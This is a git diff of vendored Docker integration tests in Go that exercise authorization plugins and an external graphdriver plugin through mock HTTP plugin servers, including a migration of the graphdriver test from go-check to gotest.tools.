assert.NilError(t, err) + + return func() { + err := os.RemoveAll("/etc/docker/plugins") + assert.NilError(t, err) + + teardown() + ctrl = nil + } +} + +// check for always allowed endpoints to not inhibit test framework functions +func isAllowed(reqURI string) bool { + for _, endpoint := range alwaysAllowed { + if strings.HasSuffix(reqURI, endpoint) { + return true + } + } + return false +} + +func TestAuthZPluginAllowRequest(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin) + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := context.Background() + + // Ensure command successful + cID := container.Run(t, ctx, client) + + assertURIRecorded(t, ctrl.requestsURIs, "/containers/create") + assertURIRecorded(t, ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", cID)) + + _, err = client.ServerVersion(ctx) + 
assert.NilError(t, err) + assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 1, ctrl.versionResCount) +} + +func TestAuthZPluginTLS(t *testing.T) { + defer setupTestV1(t)() + const ( + testDaemonHTTPSAddr = "tcp://localhost:4271" + cacertPath = "../../testdata/https/ca.pem" + serverCertPath = "../../testdata/https/server-cert.pem" + serverKeyPath = "../../testdata/https/server-key.pem" + clientCertPath = "../../testdata/https/client-cert.pem" + clientKeyPath = "../../testdata/https/client-key.pem" + ) + + d.Start(t, + "--authorization-plugin="+testAuthZPlugin, + "--tlsverify", + "--tlscacert", cacertPath, + "--tlscert", serverCertPath, + "--tlskey", serverKeyPath, + "-H", testDaemonHTTPSAddr) + + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + + client, err := newTLSAPIClient(testDaemonHTTPSAddr, cacertPath, clientCertPath, clientKeyPath) + assert.NilError(t, err) + + _, err = client.ServerVersion(context.Background()) + assert.NilError(t, err) + + assert.Equal(t, "client", ctrl.reqUser) + assert.Equal(t, "client", ctrl.resUser) +} + +func newTLSAPIClient(host, cacertPath, certPath, keyPath string) (client.APIClient, error) { + dialer := &net.Dialer{ + KeepAlive: 30 * time.Second, + Timeout: 30 * time.Second, + } + return client.NewClientWithOpts( + client.WithTLSClientConfig(cacertPath, certPath, keyPath), + client.WithDialer(dialer), + client.WithHost(host)) +} + +func TestAuthZPluginDenyRequest(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = false + ctrl.reqRes.Msg = unauthorizedMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 0, ctrl.versionResCount) + + // Ensure unauthorized message appears in response + assert.Equal(t, fmt.Sprintf("Error response from daemon: authorization denied 
by plugin %s: %s", testAuthZPlugin, unauthorizedMessage), err.Error()) +} + +// TestAuthZPluginAPIDenyResponse validates that when authorization +// plugin deny the request, the status code is forbidden +func TestAuthZPluginAPIDenyResponse(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = false + ctrl.resRes.Msg = unauthorizedMessage + + daemonURL, err := url.Parse(d.Sock()) + assert.NilError(t, err) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + assert.NilError(t, err) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + assert.NilError(t, err) + resp, err := client.Do(req) + + assert.NilError(t, err) + assert.DeepEqual(t, http.StatusForbidden, resp.StatusCode) +} + +func TestAuthZPluginDenyResponse(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = false + ctrl.resRes.Msg = unauthorizedMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 1, ctrl.versionResCount) + + // Ensure unauthorized message appears in response + assert.Equal(t, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s", testAuthZPlugin, unauthorizedMessage), err.Error()) +} + +// TestAuthZPluginAllowEventStream verifies event stream propagates +// correctly after request pass through by the authorization plugin +func TestAuthZPluginAllowEventStream(t *testing.T) { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin) + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := 
context.Background() + + startTime := strconv.FormatInt(systemTime(t, client, testEnv).Unix(), 10) + events, errs, cancel := systemEventsSince(client, startTime) + defer cancel() + + // Create a container and wait for the creation events + cID := container.Run(t, ctx, client) + + for i := 0; i < 100; i++ { + c, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + if c.State.Running { + break + } + if i == 99 { + t.Fatal("Container didn't run within 10s") + } + time.Sleep(100 * time.Millisecond) + } + + created := false + started := false + for !created && !started { + select { + case event := <-events: + if event.Type == eventtypes.ContainerEventType && event.Actor.ID == cID { + if event.Action == "create" { + created = true + } + if event.Action == "start" { + started = true + } + } + case err := <-errs: + if err == io.EOF { + t.Fatal("premature end of event stream") + } + assert.NilError(t, err) + case <-time.After(30 * time.Second): + // Fail the test + t.Fatal("event stream timeout") + } + } + + // Ensure both events and container endpoints are passed to the + // authorization plugin + assertURIRecorded(t, ctrl.requestsURIs, "/events") + assertURIRecorded(t, ctrl.requestsURIs, "/containers/create") + assertURIRecorded(t, ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", cID)) +} + +func systemTime(t *testing.T, client client.APIClient, testEnv *environment.Execution) time.Time { + if testEnv.IsLocalDaemon() { + return time.Now() + } + + ctx := context.Background() + info, err := client.Info(ctx) + assert.NilError(t, err) + + dt, err := time.Parse(time.RFC3339Nano, info.SystemTime) + assert.NilError(t, err, "invalid time format in GET /info response") + return dt +} + +func systemEventsSince(client client.APIClient, since string) (<-chan eventtypes.Message, <-chan error, func()) { + eventOptions := types.EventsOptions{ + Since: since, + } + ctx, cancel := context.WithCancel(context.Background()) + events, errs := client.Events(ctx, 
eventOptions) + + return events, errs, cancel +} + +func TestAuthZPluginErrorResponse(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Allow = true + ctrl.resRes.Err = errorMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage), err.Error()) +} + +func TestAuthZPluginErrorRequest(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin) + ctrl.reqRes.Err = errorMessage + + client, err := d.NewClient() + assert.NilError(t, err) + + // Ensure command is blocked + _, err = client.ServerVersion(context.Background()) + assert.Assert(t, err != nil) + assert.Equal(t, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage), err.Error()) +} + +func TestAuthZPluginEnsureNoDuplicatePluginRegistration(t *testing.T) { + defer setupTestV1(t)() + d.Start(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin) + + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + + client, err := d.NewClient() + assert.NilError(t, err) + + _, err = client.ServerVersion(context.Background()) + assert.NilError(t, err) + + // assert plugin is only called once.. 
+ assert.Equal(t, 1, ctrl.versionReqCount) + assert.Equal(t, 1, ctrl.versionResCount) +} + +func TestAuthZPluginEnsureLoadImportWorking(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin) + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := context.Background() + + tmp, err := ioutil.TempDir("", "test-authz-load-import") + assert.NilError(t, err) + defer os.RemoveAll(tmp) + + savedImagePath := filepath.Join(tmp, "save.tar") + + err = imageSave(client, savedImagePath, "busybox") + assert.NilError(t, err) + err = imageLoad(client, savedImagePath) + assert.NilError(t, err) + + exportedImagePath := filepath.Join(tmp, "export.tar") + + cID := container.Run(t, ctx, client) + + responseReader, err := client.ContainerExport(context.Background(), cID) + assert.NilError(t, err) + defer responseReader.Close() + file, err := os.Create(exportedImagePath) + assert.NilError(t, err) + defer file.Close() + _, err = io.Copy(file, responseReader) + assert.NilError(t, err) + + err = imageImport(client, exportedImagePath) + assert.NilError(t, err) +} + +func TestAuthzPluginEnsureContainerCopyToFrom(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = true + d.StartWithBusybox(t, "--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin) + + dir, err := ioutil.TempDir("", t.Name()) + assert.Assert(t, err) + defer os.RemoveAll(dir) + + f, err := ioutil.TempFile(dir, "send") + assert.Assert(t, err) + defer f.Close() + + buf := make([]byte, 1024) + fileSize := len(buf) * 1024 * 10 + for written := 0; written < fileSize; { + n, err := f.Write(buf) + assert.Assert(t, err) + written += n + } + + ctx := context.Background() + client, err := d.NewClient() + assert.Assert(t, err) + + cID := container.Run(t, ctx, client) + defer client.ContainerRemove(ctx, cID, 
types.ContainerRemoveOptions{Force: true}) + + _, err = f.Seek(0, io.SeekStart) + assert.Assert(t, err) + + srcInfo, err := archive.CopyInfoSourcePath(f.Name(), false) + assert.Assert(t, err) + srcArchive, err := archive.TarResource(srcInfo) + assert.Assert(t, err) + defer srcArchive.Close() + + dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, archive.CopyInfo{Path: "/test"}) + assert.Assert(t, err) + + err = client.CopyToContainer(ctx, cID, dstDir, preparedArchive, types.CopyToContainerOptions{}) + assert.Assert(t, err) + + rdr, _, err := client.CopyFromContainer(ctx, cID, "/test") + assert.Assert(t, err) + _, err = io.Copy(ioutil.Discard, rdr) + assert.Assert(t, err) +} + +func imageSave(client client.APIClient, path, image string) error { + ctx := context.Background() + responseReader, err := client.ImageSave(ctx, []string{image}) + if err != nil { + return err + } + defer responseReader.Close() + file, err := os.Create(path) + if err != nil { + return err + } + defer file.Close() + _, err = io.Copy(file, responseReader) + return err +} + +func imageLoad(client client.APIClient, path string) error { + file, err := os.Open(path) + if err != nil { + return err + } + defer file.Close() + quiet := true + ctx := context.Background() + response, err := client.ImageLoad(ctx, file, quiet) + if err != nil { + return err + } + defer response.Body.Close() + return nil +} + +func imageImport(client client.APIClient, path string) error { + file, err := os.Open(path) + if err != nil { + return err + } + defer file.Close() + options := types.ImageImportOptions{} + ref := "" + source := types.ImageImportSource{ + Source: file, + SourceName: "-", + } + ctx := context.Background() + responseReader, err := client.ImageImport(ctx, source, ref, options) + if err != nil { + return err + } + defer responseReader.Close() + return nil +} + +func TestAuthZPluginHeader(t *testing.T) { + defer setupTestV1(t)() + ctrl.reqRes.Allow = true + ctrl.resRes.Allow = 
true + d.StartWithBusybox(t, "--debug", "--authorization-plugin="+testAuthZPlugin) + + daemonURL, err := url.Parse(d.Sock()) + assert.NilError(t, err) + + conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) + assert.NilError(t, err) + client := httputil.NewClientConn(conn, nil) + req, err := http.NewRequest("GET", "/version", nil) + assert.NilError(t, err) + resp, err := client.Do(req) + assert.NilError(t, err) + assert.Equal(t, "application/json", resp.Header["Content-Type"][0]) +} + +// assertURIRecorded verifies that the given URI was sent and recorded +// in the authz plugin +func assertURIRecorded(t *testing.T, uris []string, uri string) { + var found bool + for _, u := range uris { + if strings.Contains(u, uri) { + found = true + break + } + } + if !found { + t.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ",")) + } +} diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go new file mode 100644 index 0000000000..5ebaca41c6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go @@ -0,0 +1,175 @@ +// +build !windows + +package authz // import "github.com/docker/docker/integration/plugin/authz" + +import ( + "context" + "fmt" + "io/ioutil" + "os" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "github.com/docker/docker/client" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/integration/internal/requirement" + "gotest.tools/assert" + "gotest.tools/skip" +) + +var ( + authzPluginName = "riyaz/authz-no-volume-plugin" + authzPluginTag = "latest" + authzPluginNameWithTag = authzPluginName + ":" + authzPluginTag + authzPluginBadManifestName = "riyaz/authz-plugin-bad-manifest" + 
nonexistentAuthzPluginName = "riyaz/nonexistent-authz-plugin" +) + +func setupTestV2(t *testing.T) func() { + skip.If(t, testEnv.DaemonInfo.OSType != "linux") + skip.If(t, !requirement.HasHubConnectivity(t)) + + teardown := setupTest(t) + + d.Start(t) + + return teardown +} + +func TestAuthZPluginV2AllowNonVolumeRequest(t *testing.T) { + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + ctx := context.Background() + + // Install authz plugin + err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag) + assert.NilError(t, err) + // start the daemon with the plugin and load busybox, --net=none build fails otherwise + // because it needs to pull busybox + d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag) + d.LoadBusybox(t) + + // Ensure docker run command and accompanying docker ps are successful + cID := container.Run(t, ctx, client) + + _, err = client.ContainerInspect(ctx, cID) + assert.NilError(t, err) +} + +func TestAuthZPluginV2Disable(t *testing.T) { + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + // Install authz plugin + err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag) + assert.NilError(t, err) + + d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag) + d.LoadBusybox(t) + + _, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + // disable the plugin + err = client.PluginDisable(context.Background(), authzPluginNameWithTag, types.PluginDisableOptions{}) + assert.NilError(t, err) + + // now test to see if the docker api works. 
+ _, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"}) + assert.NilError(t, err) +} + +func TestAuthZPluginV2RejectVolumeRequests(t *testing.T) { + skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + // Install authz plugin + err = pluginInstallGrantAllPermissions(client, authzPluginNameWithTag) + assert.NilError(t, err) + + // restart the daemon with the plugin + d.Restart(t, "--authorization-plugin="+authzPluginNameWithTag) + + _, err = client.VolumeCreate(context.Background(), volumetypes.VolumeCreateBody{Driver: "local"}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + _, err = client.VolumeList(context.Background(), filters.Args{}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + // The plugin will block the command before it can determine the volume does not exist + err = client.VolumeRemove(context.Background(), "test", false) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + _, err = client.VolumeInspect(context.Background(), "test") + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) + + _, err = client.VolumesPrune(context.Background(), filters.Args{}) + assert.Assert(t, err != nil) + assert.Assert(t, strings.Contains(err.Error(), fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag))) +} + +func TestAuthZPluginV2BadManifestFailsDaemonStart(t *testing.T) { + 
skip.If(t, os.Getenv("DOCKER_ENGINE_GOARCH") != "amd64") + defer setupTestV2(t)() + + client, err := d.NewClient() + assert.NilError(t, err) + + // Install authz plugin with bad manifest + err = pluginInstallGrantAllPermissions(client, authzPluginBadManifestName) + assert.NilError(t, err) + + // start the daemon with the plugin, it will error + err = d.RestartWithError("--authorization-plugin=" + authzPluginBadManifestName) + assert.Assert(t, err != nil) + + // restarting the daemon without requiring the plugin will succeed + d.Start(t) +} + +func TestAuthZPluginV2NonexistentFailsDaemonStart(t *testing.T) { + defer setupTestV2(t)() + + // start the daemon with a non-existent authz plugin, it will error + err := d.RestartWithError("--authorization-plugin=" + nonexistentAuthzPluginName) + assert.Assert(t, err != nil) + + // restarting the daemon without requiring the plugin will succeed + d.Start(t) +} + +func pluginInstallGrantAllPermissions(client client.APIClient, name string) error { + ctx := context.Background() + options := types.PluginInstallOptions{ + RemoteRef: name, + AcceptAllPermissions: true, + } + responseReader, err := client.PluginInstall(ctx, "", options) + if err != nil { + return err + } + defer responseReader.Close() + // we have to read the response out here because the client API + // actually starts a goroutine which we can only be sure has + // completed when we get EOF from reading responseBody + _, err = ioutil.ReadAll(responseReader) + return err +} diff --git a/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go b/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go new file mode 100644 index 0000000000..75555dc96f --- /dev/null +++ b/vendor/github.com/docker/docker/integration/plugin/authz/main_test.go @@ -0,0 +1,180 @@ +// +build !windows + +package authz // import "github.com/docker/docker/integration/plugin/authz" + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + 
"os" + "strings" + "testing" + + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/environment" + "github.com/docker/docker/pkg/authorization" + "github.com/docker/docker/pkg/plugins" + "gotest.tools/skip" +) + +var ( + testEnv *environment.Execution + d *daemon.Daemon + server *httptest.Server +) + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + setupSuite() + exitCode := m.Run() + teardownSuite() + + os.Exit(exitCode) +} + +func setupTest(t *testing.T) func() { + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + environment.ProtectAll(t, testEnv) + + d = daemon.New(t, daemon.WithExperimental) + + return func() { + if d != nil { + d.Stop(t) + } + testEnv.Clean(t) + } +} + +func setupSuite() { + mux := http.NewServeMux() + server = httptest.NewServer(mux) + + mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { + b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}}) + if err != nil { + panic("could not marshal json for /Plugin.Activate: " + err.Error()) + } + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + if err != nil { + panic("could not read body for /AuthZPlugin.AuthZReq: " + err.Error()) + } + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + if err != nil { + panic("could not unmarshal json for /AuthZPlugin.AuthZReq: " + err.Error()) + } + + assertBody(authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody) + assertAuthHeaders(authReq.RequestHeaders) + + // Count only server version api + if strings.HasSuffix(authReq.RequestURI, serverVersionAPI) { + 
ctrl.versionReqCount++ + } + + ctrl.requestsURIs = append(ctrl.requestsURIs, authReq.RequestURI) + + reqRes := ctrl.reqRes + if isAllowed(authReq.RequestURI) { + reqRes = authorization.Response{Allow: true} + } + if reqRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(reqRes) + if err != nil { + panic("could not marshal json for /AuthZPlugin.AuthZReq: " + err.Error()) + } + + ctrl.reqUser = authReq.User + w.Write(b) + }) + + mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) { + defer r.Body.Close() + body, err := ioutil.ReadAll(r.Body) + if err != nil { + panic("could not read body for /AuthZPlugin.AuthZRes: " + err.Error()) + } + authReq := authorization.Request{} + err = json.Unmarshal(body, &authReq) + if err != nil { + panic("could not unmarshal json for /AuthZPlugin.AuthZRes: " + err.Error()) + } + + assertBody(authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody) + assertAuthHeaders(authReq.ResponseHeaders) + + // Count only server version api + if strings.HasSuffix(authReq.RequestURI, serverVersionAPI) { + ctrl.versionResCount++ + } + resRes := ctrl.resRes + if isAllowed(authReq.RequestURI) { + resRes = authorization.Response{Allow: true} + } + if resRes.Err != "" { + w.WriteHeader(http.StatusInternalServerError) + } + b, err := json.Marshal(resRes) + if err != nil { + panic("could not marshal json for /AuthZPlugin.AuthZRes: " + err.Error()) + } + ctrl.resUser = authReq.User + w.Write(b) + }) +} + +func teardownSuite() { + if server == nil { + return + } + + server.Close() +} + +// assertAuthHeaders validates authentication headers are removed +func assertAuthHeaders(headers map[string]string) error { + for k := range headers { + if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") { + panic(fmt.Sprintf("Found authentication headers in request '%v'", headers)) + } + } + return nil +} + +// assertBody asserts that body is 
removed for non text/json requests +func assertBody(requestURI string, headers map[string]string, body []byte) { + if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 { + panic("Body included for authentication endpoint " + string(body)) + } + + for k, v := range headers { + if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" { + return + } + } + if len(body) > 0 { + panic(fmt.Sprintf("Body included while it should not (Headers: '%v')", headers)) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go b/vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go similarity index 50% rename from vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go rename to vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go index a794ca742d..3596056a84 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_external_graphdriver_unix_test.go +++ b/vendor/github.com/docker/docker/integration/plugin/graphdriver/external_test.go @@ -1,8 +1,7 @@ -// +build !windows - -package main +package graphdriver import ( + "context" "encoding/json" "fmt" "io" @@ -10,29 +9,24 @@ import ( "net/http" "net/http/httptest" "os" - "strings" + "runtime" + "testing" + "github.com/docker/docker/api/types" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/client" "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/daemon/graphdriver/vfs" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/integration/internal/requirement" + "github.com/docker/docker/internal/test/daemon" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/plugins" - "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) -func init() { - 
check.Suite(&DockerExternalGraphdriverSuite{ - ds: &DockerSuite{}, - }) -} - -type DockerExternalGraphdriverSuite struct { - server *httptest.Server - jserver *httptest.Server - ds *DockerSuite - d *Daemon - ec map[string]*graphEventsCounter -} - type graphEventsCounter struct { activations int creations int @@ -50,44 +44,69 @@ type graphEventsCounter struct { diffsize int } -func (s *DockerExternalGraphdriverSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) -} - -func (s *DockerExternalGraphdriverSuite) OnTimeout(c *check.C) { - s.d.DumpStackAndQuit() -} - -func (s *DockerExternalGraphdriverSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) -} +func TestExternalGraphDriver(t *testing.T) { + skip.If(t, runtime.GOOS == "windows") + skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon") + skip.If(t, !requirement.HasHubConnectivity(t)) + + // Setup plugin(s) + ec := make(map[string]*graphEventsCounter) + sserver := setupPluginViaSpecFile(t, ec) + jserver := setupPluginViaJSONFile(t, ec) + // Create daemon + d := daemon.New(t, daemon.WithExperimental) + c := d.NewClientT(t) + + for _, tc := range []struct { + name string + test func(client.APIClient, *daemon.Daemon) func(*testing.T) + }{ + { + name: "json", + test: testExternalGraphDriver("json", ec), + }, + { + name: "spec", + test: testExternalGraphDriver("spec", ec), + }, + { + name: "pull", + test: testGraphDriverPull, + }, + } { + t.Run(tc.name, tc.test(c, d)) + } -func (s *DockerExternalGraphdriverSuite) SetUpSuite(c *check.C) { - s.ec = make(map[string]*graphEventsCounter) - s.setUpPluginViaSpecFile(c) - s.setUpPluginViaJSONFile(c) + sserver.Close() + jserver.Close() + err := os.RemoveAll("/etc/docker/plugins") + assert.NilError(t, err) } -func (s *DockerExternalGraphdriverSuite) setUpPluginViaSpecFile(c *check.C) { +func setupPluginViaSpecFile(t *testing.T, ec map[string]*graphEventsCounter) *httptest.Server { mux := http.NewServeMux() - s.server = 
httptest.NewServer(mux) + server := httptest.NewServer(mux) + + setupPlugin(t, ec, "spec", mux, []byte(server.URL)) - s.setUpPlugin(c, "test-external-graph-driver", "spec", mux, []byte(s.server.URL)) + return server } -func (s *DockerExternalGraphdriverSuite) setUpPluginViaJSONFile(c *check.C) { +func setupPluginViaJSONFile(t *testing.T, ec map[string]*graphEventsCounter) *httptest.Server { mux := http.NewServeMux() - s.jserver = httptest.NewServer(mux) + server := httptest.NewServer(mux) - p := plugins.NewLocalPlugin("json-external-graph-driver", s.jserver.URL) + p := plugins.NewLocalPlugin("json-external-graph-driver", server.URL) b, err := json.Marshal(p) - c.Assert(err, check.IsNil) + assert.NilError(t, err) - s.setUpPlugin(c, "json-external-graph-driver", "json", mux, b) + setupPlugin(t, ec, "json", mux, b) + + return server } -func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ext string, mux *http.ServeMux, b []byte) { +func setupPlugin(t *testing.T, ec map[string]*graphEventsCounter, ext string, mux *http.ServeMux, b []byte) { + name := fmt.Sprintf("%s-external-graph-driver", ext) type graphDriverRequest struct { ID string `json:",omitempty"` Parent string `json:",omitempty"` @@ -106,7 +125,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex } respond := func(w http.ResponseWriter, data interface{}) { - w.Header().Set("Content-Type", "appplication/vnd.docker.plugins.v1+json") + w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1+json") switch t := data.(type) { case error: fmt.Fprintln(w, fmt.Sprintf(`{"Err": %q}`, t.Error())) @@ -126,24 +145,24 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex } base, err := ioutil.TempDir("", name) - c.Assert(err, check.IsNil) + assert.NilError(t, err) vfsProto, err := vfs.Init(base, []string{}, nil, nil) - c.Assert(err, check.IsNil, check.Commentf("error initializing graph driver")) + assert.NilError(t, err, 
"error initializing graph driver") driver := graphdriver.NewNaiveDiffDriver(vfsProto, nil, nil) - s.ec[ext] = &graphEventsCounter{} + ec[ext] = &graphEventsCounter{} mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].activations++ + ec[ext].activations++ respond(w, `{"Implements": ["GraphDriver"]}`) }) mux.HandleFunc("/GraphDriver.Init", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].init++ + ec[ext].init++ respond(w, "{}") }) mux.HandleFunc("/GraphDriver.CreateReadWrite", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].creations++ + ec[ext].creations++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -157,7 +176,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Create", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].creations++ + ec[ext].creations++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -171,7 +190,7 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Remove", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].removals++ + ec[ext].removals++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { @@ -186,23 +205,24 @@ func (s *DockerExternalGraphdriverSuite) setUpPlugin(c *check.C, name string, ex }) mux.HandleFunc("/GraphDriver.Get", func(w http.ResponseWriter, r *http.Request) { - s.ec[ext].gets++ + ec[ext].gets++ var req graphDriverRequest if err := decReq(r.Body, &req, w); err != nil { return } + // TODO @gupta-ak: Figure out what to do here. 
